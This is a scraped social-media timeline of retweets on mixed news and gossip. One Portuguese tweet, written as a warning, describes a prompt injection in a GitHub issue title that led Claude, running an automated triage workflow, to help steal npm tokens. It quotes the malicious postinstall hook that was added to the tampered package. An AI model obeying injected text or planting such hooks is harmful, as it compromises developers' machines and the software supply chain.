Amber Takahashi (d/acc)

56.5K posts

Amber Takahashi (d/acc) banner
Amber Takahashi (d/acc)

Amber Takahashi (d/acc)

@amberlytics

interests: ai/ml sec, policy, systems thinking, cyber threat intel, fashion, sustainability, 2A

Washington, DC Katılım Eylül 2011
1.2K Takip Edilen17.6K Takipçiler
Amber Takahashi (d/acc)
Amber Takahashi (d/acc)@amberlytics·
GIF
Ryan@ohryansbelt

Delve, a YC-backed compliance startup that raised $32 million, has been accused of systematically faking SOC 2, ISO 27001, HIPAA, and GDPR compliance reports for hundreds of clients. According to a detailed Substack investigation by DeepDelver, a leaked Google spreadsheet containing links to hundreds of confidential draft audit reports revealed that Delve generates auditor conclusions before any auditor reviews evidence, uses the same template across 99.8% of reports, and relies on Indian certification mills operating through empty US shells instead of the "US-based CPA firms" they advertise. Here's the breakdown: > 493 out of 494 leaked SOC 2 reports allegedly contain identical boilerplate text, including the same grammatical errors and nonsensical sentences, with only a company name, logo, org chart, and signature swapped in > Auditor conclusions and test procedures are reportedly pre-written in draft reports before clients even provide their company description, which would violate AICPA independence rules requiring auditors to independently design tests and form conclusions > All 259 Type II reports claim zero security incidents, zero personnel changes, zero customer terminations, and zero cyber incidents during the observation period, with identical "unable to test" conclusions across every client > Delve's "US-based auditors" are actually Accorp and Gradient, described as Indian certification mills operating through US shell entities. 99%+ of clients reportedly went through one of these two firms over the past 6 months > The platform allegedly publishes fully populated trust pages claiming vulnerability scanning, pentesting, and data recovery simulations before any compliance work has been done > Delve pre-fabricates board meeting minutes, risk assessments, security incident simulations, and employee evidence that clients can adopt with a single click, according to the author > Most "integrations" are just containers for manual screenshots with no actual API connections. The author describes the platform as a "SOC 2 template pack with a thin SaaS wrapper" > When the leak was exposed, CEO Karun Kaushik emailed clients calling the allegations "falsified claims" from an "AI-generated email" and stated no sensitive data was accessed, while the reports themselves contained private signatures and confidential architecture diagrams > Companies relying on these reports could face criminal liability under HIPAA and fines up to 4% of global revenue under GDPR for compliance violations they believed were resolved > When clients threaten to leave, Delve reportedly pairs them with an external vCISO for manual off-platform work, which the author argues proves their own platform can't deliver real compliance > Delve's sales price dropped from $15,000 to $6,000 with ISO 27001 and a penetration test thrown in when a client mentioned considering a competitor

ZXX
1
0
3
794
Amber Takahashi (d/acc) retweetledi
Steve Sweeney
Steve Sweeney@SweeneySteve·
Today I$rael tried to kill me in a targeted airstrike in southern Lebanon as I was reporting on was the targeting of bridges and the forced displacement of 1 million people, an ethnic cleansing operation on a larger scale than the Nakba I have absolutely no doubt that this was deliberate. Despite claims there were no warnings ahead of the strike and no notifications sent to the Lebanese Army who allowed us to film As we have seen in Gaza they want to silence journalists who document and report their war crimes It is the western powers who provide political and military support for I$rael, arming it to the teeth to carry out genocide in Gaza and ethnic cleansing here in Lebanon. They are not simply complicit, but active participants and should be held accountable for their actions. But if I$rael thinks today’s strike will silence us and keep us out of the field they are very, very mistaken
English
5.7K
59.7K
197K
6.1M
Amber Takahashi (d/acc) retweetledi
TMZ
TMZ@TMZ·
😱 British journalist Steve Sweeney and his cameraman Ali Rida had an extremely close call today while reporting on missile strikes. Credit: RT
English
278
866
6K
1.6M
Amber Takahashi (d/acc) retweetledi
BlackSword
BlackSword@Blacksword011·
"My wig slid clean off my forehead this morning"
English
9
79
1.5K
49.5K
Amber Takahashi (d/acc) retweetledi
Lex P🪬
Lex P🪬@LexP__·
Mal’s money bags or The Game’s F3?
English
159
395
2.4K
249.9K
Amber Takahashi (d/acc) retweetledi
Deborah Folloni
Deborah Folloni@dfolloni·
Um hacker simplesmente hackeou o @cline e instalou o OpenClaw em 4.000 computadores com prompt injection 🫠 Olha que loucura: - O time do Cline criou um workflow de triagem de issues automatizado no GitHub, usando o próprio Claude pra ler e categorizar os tickets - O hacker abriu uma issue com um prompt injection no título — o Claude leu, achou que era uma instrução legítima, e executou - Com isso, ele encheu o cache do GitHub com lixo até forçar a deleção dos caches legítimos de build, substituiu por caches envenenados, e roubou os tokens de publicação do npm - Com os tokens em mãos, ele publicou uma nova versão do cline que parecia idêntica a anterior, só que com uma linhazinha a mais no package.json: "postinstall": "npm install -g openclaw@latest" Resultado: 4,000 devs instalaram o openclaw nas suas máquinas sem saber (aka: um agente com acesso total ao seu computador) 🥲 Muito importante lembrar que IAs não têm malícia e por isso prompt injections são, na minha opinião, a maior vulnerabilidade delas. Resumindo galera: CUIDADO. quem quiser ler na íntegra: thehackernews.com/2026/02/cline-…
Português
57
262
1.9K
149.5K
Amber Takahashi (d/acc) retweetledi
Garage 66 & MBM Motorsports
Garage 66 & MBM Motorsports@MBMMotorsports·
We are so excited to confirm motorcycle drag racer Dystany Spurlock will get to make her major stock car debut next week in the #ARCA Menards Series East season-opener at Hickory. She will race the Foxxtecca.com No. 66 in the Cook Out 200 coming up Saturday, March 28.
Garage 66 & MBM Motorsports tweet media
English
63
992
3.9K
597K
Amber Takahashi (d/acc) retweetledi
CSPAN
CSPAN@cspan·
Q: "Why didn't you tell U.S. allies…about the war before attacking Iran?" President Trump: "We wanted surprise. Who knows better about surprise than Japan? Why didn't you tell me about Pearl Harbor?"
English
1.1K
1.7K
9.9K
6.6M
Amber Takahashi (d/acc) retweetledi
Chris Marquette
Chris Marquette@ChrisMarquette_·
New: The House Oversight Committee on Wednesday approved a bill that would stop Washington, D.C., from using its automated traffic enforcement cameras. Vote was 21-19. No Dems supported it.
English
9
57
401
92.8K
Amber Takahashi (d/acc) retweetledi
Governor Tony Evers
Governor Tony Evers@GovEvers·
BREAKING: I just signed the bill to extend postpartum coverage for Wisconsin moms from a lousy 60 days to one full year after giving birth. I promised I'd never stop fighting to make sure moms and babies had the postpartum care they need, and today, I delivered on that promise.
English
595
3.9K
31.7K
2.2M
Amber Takahashi (d/acc) retweetledi
mariana Z
mariana Z@mariana057·
If you're cremated after you die, you can be put into an hourglass and continue to participate in family game night.
English
609
9K
93.2K
1.8M
Daniel Boguslaw
Daniel Boguslaw@DRBoguslaw·
Has anyone ever made a tv show or movie about the spy suburbs of northern Virginia?
English
206
101
4.4K
586K
Big Brother Tea
Big Brother Tea@TheBigBroTea·
Devonta made an absurdly long IG post to blame Brittany for him not wanting to be with her. But the main reason he made this post seems to be that he is mad that he posted a baby mama reveal and people said he “downgraded” #loveisblind
Big Brother Tea tweet mediaBig Brother Tea tweet mediaBig Brother Tea tweet mediaBig Brother Tea tweet media
English
73
41
1.1K
107.7K
Amber Takahashi (d/acc) retweetledi
Polymarket
Polymarket@Polymarket·
We're excited to announce 'The Situation Room' by Polymarket is coming to Washington, D.C. The world's first bar dedicated to monitoring the situation. 🧵
Polymarket tweet media
English
1.6K
2.3K
27.2K
32.8M
Amber Takahashi (d/acc) retweetledi
R✩VE
R✩VE@ravesuniverse·
olandria came out the villa and completely skipped the influencer route and went straight into being a celebrity, that’s practically unheard of😭 she’s set a new standard and it took her less than a year to do so. denying her impact atp is just insane, you will respect her!
English
50
2.9K
32K
383.3K